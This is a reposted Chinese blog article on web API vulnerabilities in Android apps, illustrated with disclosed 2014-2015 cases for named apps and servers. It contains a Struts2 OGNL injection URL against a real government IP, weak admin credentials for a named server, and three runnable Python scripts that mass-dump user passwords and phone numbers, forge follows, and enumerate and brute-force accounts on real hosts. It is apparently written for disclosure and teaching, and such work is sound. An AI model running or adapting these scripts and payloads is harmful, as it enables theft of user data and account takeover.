Android应用安全之WEB接口安全

最新推荐文章于 2024-09-03 17:19:15 发布
最新推荐文章于 2024-09-03 17:19:15 发布
阅读量107 收藏
点赞数
文章标签: 移动开发 json python

Android应用安全不仅包括客户端的安全,也包括web接口的安全。移动App中的Web接口安全主要分为以下几块:

1.SQL注入漏洞

这是一个不能再常见的漏洞类型了,由于App的特性,开发人员认为使用App时无法获取到详细URL等信息,所以忽视了App防注入的编写。

例如:

糗事百科某处SQL注入可导致1500w用户信息泄露

http://loudong.360.cn/vul/info/qid/QTVA-2015-177818

全峰快递注入漏洞,可直接建服务器用户,各种订单用户数据泄露

http://loudong.360.cn/vul/info/qid/QTVA-2014-106574

永辉超市Appsql注入导致超市及用户信息泄露

http://loudong.360.cn/vul/info/qid/QTVA-2014-106385

社交App“小湿妹”某处洞洞,数据库沦陷

http://loudong.360.cn/vul/info/qid/QTVA-2015-179315

提升逼格的App“交换”数据库沦陷,用户信息泄露

http://loudong.360.cn/vul/info/qid/QTVA-2015-177968 

这些漏洞都是由于App开发中忽视了接口可能存在SQL注入问题,其中也包括POST注入,GET注入,COOKIE注入等等。

拿糗事百科注入详细举例:

在查询用户详细信息时抓包,包内容如下:

GET /user/6122886/detail?rqcnt=12&r=dec363d71423481245949 HTTP/1.1 
User-Agent: qiushibalke_6.2.0_WIFI_auto_7 Source: android_6.2.0 Model: Xiaomi/cancro_wc_lte/cancro:4.4.4/KTU84P/V6.3.3.0.KXDCNBL:user/release-keys 
Qbtoken: 929efcfa9875f584f9f4db17343d16d7b1ec404b Uuid: IMEI_2af2c2beee1dbd00d3436cffdec363d7 Deviceidinfo: {"DEVICEID":"99000566573203","RANDOM":"","ANDROID_ID":"2e6990c574abdd57","SIMNO":"89860313100285780111'","IMSI":"460031219452851","SERIAL":"5d999491","MAC":"0c:1d:af:db:07:9c","SDK_INT":19} 
Host: nearby.qiushibaike.com 
Connection: Keep-Alive 
Accept-Encoding: gzip

其中Qbtoken参数存在注入。

2.任意用户注册漏洞

 此类漏洞并不危害到用户信息泄露,但是别有用心的黑客可能会利用此漏洞注册任意手机号码,并利用此注册账号去社工号码主人的朋友或者家人。

漏洞案例: 

App“tataufo”某处漏洞可修改任意用户密码

http://loudong.360.cn/vul/info/qid/QTVA-2015-192209

App“约饭”任意用户注册

http://loudong.360.cn/vul/info/qid/QTVA-2015-193610

App“楼楼”任意用户注册

http://loudong.360.cn/vul/info/qid/QTVA-2015-193622

任意用户注册漏洞中大部分是由于验证码机制不健全和注册过程验证不严谨,其中App“约饭”任意用户注册时,发送注册请求后直接返回了验证码值。

而App“楼楼”任意用户注册中,注册流程分为四个步骤

(1).注册用户,填写手机号,发送接收验证码请求。

(2).接收验证码,并填写。

(3).填写并验证验证码,进入填写资料步骤。

(4).填写用户资料,完成注册。

而这里在第四个步骤中出现了问题,前三步正常操作,在第四步时将资料中的号码改为任意手机号即能实现任意用户注册。 

3.用户信息泄露

这种类型的漏洞多在用户资料查阅处存在,由于编写不严谨,在查询用户资料时会返回用户隐私信息,如账号邮箱,手机,密码等。

如:

App“叽友”泄露用户信息

http://loudong.360.cn/vul/info/qid/QTVA-2015-193589

Duang~App“小柚”用户信息泄露附验证脚本(密码,邮箱,手机号)

http://loudong.360.cn/vul/info/qid/QTVA-2015-187508

糗事百科某处泄露用户信息

http://loudong.360.cn/vul/info/qid/QTVA-2015-177827

拿App“小柚”举例

访问用户资料直接返回一些敏感信息,密码,邮箱,手机号

写个Python脚本来dump用户信息

#!/usr/bin/env python # _*_ coding: utf-8 _*_
# author=Hydra_Tc
# create=20150227
 
import os
import json
import random
import requests
import threadpool as tp
 
def baopo():
    flag = 0
    userid = 0
    while True:
        flag += 1
        userid += 1
        data = {'userid' : userid,}
        api_url = 'http://App.hixiaoyou.com/User/Me/getuserinfo'
        my_string = "userid"
        try:
            print '[%s] Test Userid: %s' % (flag, userid)
            req = requests.post(api_url, data=data, timeout=5)
            req_id = json.loads(req.content)['userid']
            req_mail = json.loads(req.content)['email']
            req_mobile = json.loads(req.content)['mobile']
            req_qq = json.loads(req.content)['QQ']
            req_pass = json.loads(req.content)['password']
        except:
            req_status = 0
        if my_string in req.json():
            success_f = open('./success_user1.txt', 'a+')
            success_f.write('%s--%s--%s--%s--%s\n'%(req_id,req_qq,req_mobile,req_mail,req_pass))
            success_f.close()
 
 
if __name__ == '__main__':
    baopo()
    pool = tp.ThreadPool(100)
    reqs = tp.makeRequests(baopo)
    [pool.putRequest(req) for req in reqs]
    pool.wait()

结果如下

4.框架问题(st2等)

这个并不多但也不容忽视

国家统计局手机网站新闻管理系统两处漏洞

http://loudong.360.cn/vul/info/qid/QTVA-2014-113456

App“将爱”某漏洞可致服务器沦陷,泄露用户信息

http://loudong.360.cn/vul/info/qid/QTVA-2015-193592

国家统计局手机新闻管理系统漏洞如下:

 

http://219.235.129.108:8080/NewManager/admin/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

 5.后台弱口令

由于App站点URL信息并不是很明显,所以管理在设置后台路径和密码方面也显得比较随意

如:

北京市地铁站新闻后台管理系统沦陷

http://loudong.360.cn/vul/info/qid/QTVA-2014-124853 

抓包得到

http://119.254.65.181/SubwayManagement/webservice/SubwayService

往上跨目录得到

http://119.254.65.181/SubwayManagement/和http://119.254.65.181/两个后台系统,前者存在弱口令admin admin 和 admin beijingditieAppadmin

6.越权漏洞

这个漏洞出现率仅次于SQL注入

App“逗萌”某处设计不当(附验证脚本)

http://loudong.360.cn/vul/info/qid/QTVA-2015-192485

社交App“足记”漏洞打包

http://loudong.360.cn/vul/info/qid/QTVA-2015-178379

App“tataufo”某处漏洞可修改任意用户密码

http://loudong.360.cn/vul/info/qid/QTVA-2015-192209

拿App“逗萌”某处设计不当为例

在App中对用户添加关注处没有任何验证

POST /HC_AppClient/client-method/followUser.json HTTP/1.1 
Content-Length: 39 
Content-Type: Application/x-www-form-urlencoded 
Host: 115.29.5.49:80 
Connection: Keep-Alive 
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) fromUserId=14004049&toUserId=1398055700


写了个脚本开始刷粉丝

 1 #!/usr/bin/env python # _*_ coding: utf-8 _*_
 2 # author=Hydra_Tc
 3 # create=20150306
 4  
 5 import os
 6 import json
 7 import random
 8 import requests
 9 import threadpool as tp
10  
11 def baopo():
12     flag = 1
13     fromUserId = 13980556
14     while True:
15         flag += 1
16         fromUserId += 1
17         data = {'fromUserId' : fromUserId, 'toUserId' : '13980556',}
18         api_url = 'http://115.29.5.49/HC_APPClient/client-method/followUser.json'
19         my_string = "body"
20         try:
21             print '[%s] Test Userid: %s' % (flag, fromUserId)
22             req = requests.post(api_url, data=data, timeout=5)
23         except:
24             req_status = 0
25         if my_string in req.json():
26             success_f = open('./success_user1.txt', 'a+')
27             success_f.write('%s\n'%(fromUserId))
28             success_f.close()
29  
30 if __name__ == '__main__':
31     baopo()
32     pool = tp.ThreadPool(100)
33     reqs = tp.makeRequests(baopo)
34     [pool.putRequest(req) for req in reqs]
35     pool.wait()

 

 

 

7.接口未限制导致撞库

 其实这个我也是看到蘑菇牛发的没拍漏洞才开始注意此类型漏洞的,运气还算不错,两三天就找到个同类型的。 

App“疯拍”两处漏洞打包,附验证脚本

http://loudong.360.cn/vul/info/qid/QTVA-2015-185861 

疯拍存在两处漏洞,此处只举例接口未限制导致撞库。

我用一个未注册手机号登陆返回提示: 

{"success":false,"error":"\u8be5\u53f7\u7801\u5c1a\u672a\u6ce8\u518c\uff0c\u8bf7\u5148\u6ce8\u518c"}
{"success":false,"error":"该号码尚未注册,请先注册"}

提示尚未注册,用注册的用户登陆。

若密码错误,则会提示

{"success":false,"error":"\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3"}
{"success":false,"error":"密码错误,再仔细想想"}

若密码正确

{"success":true,"data":{"data":{"ucookie":"19151821c062f8a0252dc3a951940b8dc5a238188447a260b145e1e40fc3d48d9","username":"1234566666","avatar":"","level":0,"score":0,"setting":"{}","uid":16942,"nickname":"1234566666","t":1424918536},"expire":false}}

此处内容包含cookie,等相关信息。那么我们在蘑菇的脚本上稍微加一些改动即可实现爆破。

脚本如下,加了注释

 1 #!/usr/bin/env python    # _*_ coding: utf-8 _*_ 
 2 # author=Hydra_Tc
 3 # create=20150224S
 4 
 5 import json
 6 import random
 7 import requests
 8 import threadpool as tp
 9 
10 def _burp(mobile): # 验证密码是否正确
11         for password in ['qwertyu','123456', '123456789', '000000', mobile,'1234567','12345678','1234567890']: # 弱口令密码
12                 api_url = 'http://aifengpai.com/api/user/login'   # 登陆接口
13                 data = {'mobile': mobile,
14                                 'did':'c71c53fa20c38d4a14ae8245bac9bb99',
15                                 'password': password,}   # 登陆参数,这里简化了,去除了不必要的参数
16                 try:
17                         print '[*] Burp mobile: %s' % mobile
18                         req = requests.post(api_url, data=data, timeout=5) # requests模块的post请求
19                 except:
20                         continue
21                 try:
22                         success = json.loads(req.content)['data']
23                         burp_success = open('./fengpai_account.txt', 'a+') # 随机成功后生成该txt,并写成功数据
24                         burp_success.write('%s:::%s\n'%(mobile, password))
25                         burp_success.close()
26                         print success
27                         return success
28                 except:
29                         success = 0
30                         print '[-] Burp False'
31                         continue
32 
33 def _status(args): # 判断手机号是否注册
34         flag = 0
35         list = "0123456789" 
36         sa = []
37         for i in range(8): #长度8,改了一下蘑菇牛的范围写法,自身测试感觉测试速度稍微加快了点
38                 sa.Append(random.choice(list))
39         while True:
40                 flag += 1
41                 account_test = random.choice(['138','130','133','135','138','139','150','152','155','159','180','181','182','185','187','189'])\ # 手机号前几位
42                                                 +''.join(sa)
43                 data = {'mobile': account_test,
44                                 'did':'c71c53fa20c38d4a14ae8245bac9bb99',
45                                 'password': 'jhjhksd'}
46                 api_url = 'http://aifengpai.com/api/user/login'
47                 try:
48                         print '[%s] Test account: %s' % (flag, account_test)
49                         req = requests.post(api_url, data=data, timeout=3)
50                         req_status = json.loads(req.content)['error'] # 提取response里error处内容
51                 except:
52                         req_status = 0
53                 if req_status == u'\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3': #两值相等则存在有该账号
54                         success_f = open('./fp_phone.txt', 'a+')
55                         success_f.write('%s\n'%account_test)
56                         success_f.close()
57                         _burp(account_test)
58                         print '\n[OK] account: %s\n' % account_test
59 
60 if __name__ == '__main__':
61         args = []
62         for i in range(30):
63                 args.Append(args) 
64         pool = tp.ThreadPool(30)
65         reqs = tp.makeRequests(_status, args)
66         [pool.putRequest(req) for req in reqs]
67         pool.wait()

因为该App并没有像美拍那样拥有很多用户所以爆破起来有点难,所以我在测试的时候把,测试范围函数里的list改为了改了下蘑菇牛的随机数生成方式。

list = "8"

手机前三位改为了

account_test = random.choice(['138'])\ # 手机号前几位

进行爆破结果如下这样只会生成13888888888(这个号码提交之前测试时候注册过)

本文转载自 DyckEye
原文链接:http://www.dickeye.com/?id=16

weixin_34221073
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python把’\u’开头的字符串转中文
LDC,公众号【轻松学编程】
06-23 8557
python 把'\u'开头的字符串转中文
中文ascii转为中文显示问题
碌人乘凉, 黎硕 --> Aerchi.com
01-13 780
前一段时间,遇到从服务器请求数据,但是返回的是中文的ascii码。 让人看不懂是什么意思,例如:\u9a8c\u8bc1\u7801\u9519\u8bef\uff01 其实采用下面的方法可以很简单的解决:<script> var e='\u9a8c\u8bc1\u7801\u9519\u8bef\uff01'; alert(unescape(e)); </scrip...
移动App中常见的Web漏洞
weixin_33804990的博客
03-27 492
为什么80%的码农都做不了架构师?>>> ...
Web应用安全
phoenix7670的博客
10-11 864
​ 目前,电子商务面临的一个最大挑战是交易的安全性问题。由美国Visa和MasterCard两大信用卡组织联合多家科技机构,共同制订了应用于互联网上的以银行卡为基础进行在线交易的安全标准,即安全电子交易(Secure Electronic Transaction,SET)。+
AndroidWebView安全
laymenISmouse的专栏
01-30 809
本地攻击 (1)Content Provider SQL注入、实现openFile函数导致目录遍历 (2)Activity的导出、劫持问题 私有组件错误导出 (3)SQLite数据库 SQL注入、load_extension代码执行 1.WebView安全 Android内置用于显示Web内容的控件。除用于 实现Web浏览器之外...
android调用web接口,Android调用WebService接口详解
weixin_28849929的博客
05-26 917
我们开发大部分的网络请求都是http来完成的,所以可能有人没有用过WebService,特此写一篇来加深印象并希望可以供大家参考首先我们需要用到ksoap2的jar包我用的版本是ksoap2-android-assembly-3.5.0-jar-with-dependencies.jar,网上很容易搜到所以我就不贴了,有需要的可以留言。好了废话不多说了直接上代码//wsdl 的uriString ...
Android应用源码之通过Android客户端访问web服务器,实现一个登录功能,服务端+数据库+安卓端.zip
06-07
在本项目中,我们主要探讨的是如何通过Android客户端来访问Web服务器,实现一个完整的...通过深入研究和实践这个源码,开发者可以掌握Android应用Web服务器交互的基本流程和安全策略,为今后的项目开发打下坚实基础。
Android应用源码之从中调用web service的源码.zip
10-14
本压缩包"Android应用源码之从中调用web service的源码.zip"提供了一个具体的示例,帮助开发者了解如何在Android项目中实现这一功能。以下是对这个源码的详细解析。 首先,我们要理解Web Service的基本概念。Web ...
Android 请求 WebAPI的案例
07-15
本案例"Android请求WebAPI"将详细讲解如何在Android应用中实现这一功能。WebAPI通常指的是基于HTTP协议的RESTful API,允许客户端(如Android应用)通过HTTP方法(GET、POST、PUT、DELETE等)获取或操作服务器资源。...
安卓14(小米HyperOS)APP中修改用户头像时,APP闪退的问题(报错 ”Mutation of _data is not allowed.“)
一个AR程序猿的博客
09-02 406
安卓14(小米HyperOS)APP中修改用户头像时,APP闪退的问题java.lang.IllegalArgumentException: Mutation of _data is not allowed.
【QNX+Android虚拟化方案】107 - QNX NFS Server + Android NFS Client 完整配置
|~~~热爱生活、努力学习的小伙汁~~~|
08-31 818
【QNX+Android虚拟化方案】107 - QNX NFS Server + Android NFS Client 完整配置
Android中AsyncTask的基本用法
m0_63526467的博客
08-31 706
Android中AsyncTask的基本用法
Android 获取ip地址多种方式介绍
wenzhi的博客
08-29 2013
adb shell 的 ifconfig可以获取当前设备网络节点信息;这些信息使用Android代码也是可以获取的;Android 获取网络ip有多种方式,有时候某种方式获取失败的情况下;那么就可以换一种获取方式,所有多学习一下获取网络ip相关信息是有用的。本文介绍三种获取网络ip信息的方式,并且最后一种的代码不用任何权限就能获取到相关节点的ip和MAC地址,有兴趣的可以看看。
Flutter之CRC校验
nonagontech的博客
08-30 1002
Flutter之CRC校验
Android源码应用调用SystemProperties编译报错
xiaowang_lj的博客
08-30 237
链接:https://www.jianshu.com/p/6d374ebfa91f。商业转载请联系作者获得授权,非商业转载请注明出处。
第9章 使用ContentProvider实现数据共享
最新发布
shixianzuishuai的博客
09-03 1335
如果将ContentProvider比作一个“网站”,那么如何对外提供数据呢?是否需要像Java Web开发一样编写JSP、Servlet之类的代码呢?答案是否定的。这种做法过于复杂,毕竟ContentProvider只是提供数据的访问接口,而不是像网站那样提供完整的页面。如果把ContentProvider当作一个“网站”,如何完整地开发一个ContentProvider呢?定义自己的ContentProvider类:该类需要继承Android提供的基类。向Android系统注册这个“网站”:在。
android - 笔记
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
08-29 99
1 安装[教程]VMware安装Android虚拟机+联网_哔哩哔哩_bilibili
android 下拉刷新,androidx.swiperefreshlayout:swiperefreshlayout:1.1.0
this_is_bug的博客
08-30 706
介绍`androidx.swiperefreshlayout:swiperefreshlayout:1.1.0` 是 Android 中一个常用的组件,用于实现“下拉刷新”功能。这个组件主要用于在列表(如 `RecyclerView`、`ListView` 等)或其他可滚动视图上,实现用户通过下拉手势来触发内容刷新操作。
Android开发Web服务应用教程:从环境配置到Web服务创建
"使用 Android 开发基于...开发Android应用Web服务交互的过程涉及多个步骤,包括环境配置、服务端代码生成、客户端网络请求以及数据处理。理解这些基本概念和流程对于构建能够有效利用Web服务的Android应用至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值